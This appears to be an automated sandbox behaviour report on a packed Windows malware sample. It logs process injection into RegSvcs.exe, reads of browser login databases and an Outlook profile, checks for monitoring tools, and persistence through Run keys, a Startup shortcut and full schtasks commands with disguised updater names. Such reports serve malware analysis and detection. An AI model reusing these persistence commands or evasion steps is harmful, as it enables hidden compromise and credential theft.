        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00544A40 GetDiskFreeSpaceW,GetDiskFreeSpaceA,2_2_00544A40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004E06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,2_2_004E06D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004845E0 CreateDirectoryA,CreateDirectoryA,CoInitialize,CoCreateInstance,CoUninitialize,PathFindExtensionA,CopyFileA,Concurrency::cancel_current_task,2_2_004845E0
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
        Source: C:\Users\user\Desktop\file.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2032:120:WilError_03
        Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeMutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: file.exe, 00000000.00000002.1650745382.00000000052F5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.00000000045C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: file.exe, 00000000.00000002.1650745382.00000000052F5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.00000000045C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
        Source: SAs9CHY3YroDLogin Data For Account.2.dr, q8h87HgcZDd0Login Data.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: file.exeReversingLabs: Detection: 28%
        Source: RegSvcs.exeString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe "C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe"
        Source: unknownProcess created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
        Source: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
        Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHESTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHESTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe "C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe" Jump to behavior
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"Jump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeSection loaded: wldp.dllJump to behavior
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: EdgeMS2.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: file.exeStatic file information: File size 4792320 > 1048576
        Source: file.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x321600
        Source: file.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x126200
        Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: file.exe, 00000000.00000002.1650745382.0000000005238000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1659746305.0000000005A30000.00000004.10000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.1650745382.00000000045C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.00000000050AD000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
        Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: file.exe, 00000000.00000002.1646603659.0000000000414000.00000040.00000001.01000000.00000003.sdmp
        Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000002.00000002.4086941629.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000002.00000002.4086941629.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: file.exe, 00000000.00000002.1659746305.0000000005AEA000.00000004.10000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.0000000004FDF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.000000000516A000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.80000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeUnpacked PE file: 7.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeUnpacked PE file: 8.2.q2xutezn4kFdLk2viqDb.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeUnpacked PE file: 9.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeUnpacked PE file: 15.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeUnpacked PE file: 18.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeUnpacked PE file: 21.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exeUnpacked PE file: 22.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: file.exeStatic PE information: 0xAFC99B72 [Sat Jun 16 13:15:30 2063 UTC]
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF6B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6CF6B6C0
        Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name: .themida
        Source: file.exeStatic PE information: section name: .boot
        Source: l2[1].exe.2.drStatic PE information: section name: .MPRESS1
        Source: l2[1].exe.2.drStatic PE information: section name: .MPRESS2
        Source: q2xutezn4kFdLk2viqDb.exe.2.drStatic PE information: section name: .MPRESS1
        Source: q2xutezn4kFdLk2viqDb.exe.2.drStatic PE information: section name: .MPRESS2
        Source: AdobeUpdaterV2.exe.2.drStatic PE information: section name: .MPRESS1
        Source: AdobeUpdaterV2.exe.2.drStatic PE information: section name: .MPRESS2
        Source: MSIUpdaterV2.exe.2.drStatic PE information: section name: .MPRESS1
        Source: MSIUpdaterV2.exe.2.drStatic PE information: section name: .MPRESS2
        Source: EdgeMS2.exe.2.drStatic PE information: section name: .MPRESS1
        Source: EdgeMS2.exe.2.drStatic PE information: section name: .MPRESS2
        Source: oobeldr.exe.8.drStatic PE information: section name: .MPRESS1
        Source: oobeldr.exe.8.drStatic PE information: section name: .MPRESS2
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFBCC2B push ecx; ret 0_2_6CFBCC3E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFBD565 push ecx; ret 0_2_6CFBD578
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0339625C push eax; iretd 0_2_0339625D
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_03392730 push eax; mov dword ptr [esp], ecx0_2_03392731
        Source: file.exeStatic PE information: section name: .boot entropy: 7.959446021495236
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeJump to dropped file
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeJump to dropped file
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe (copy)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\l2[1].exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeJump to dropped file

        Boot Survival

        barindex
        Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004EE170 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004EE170
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
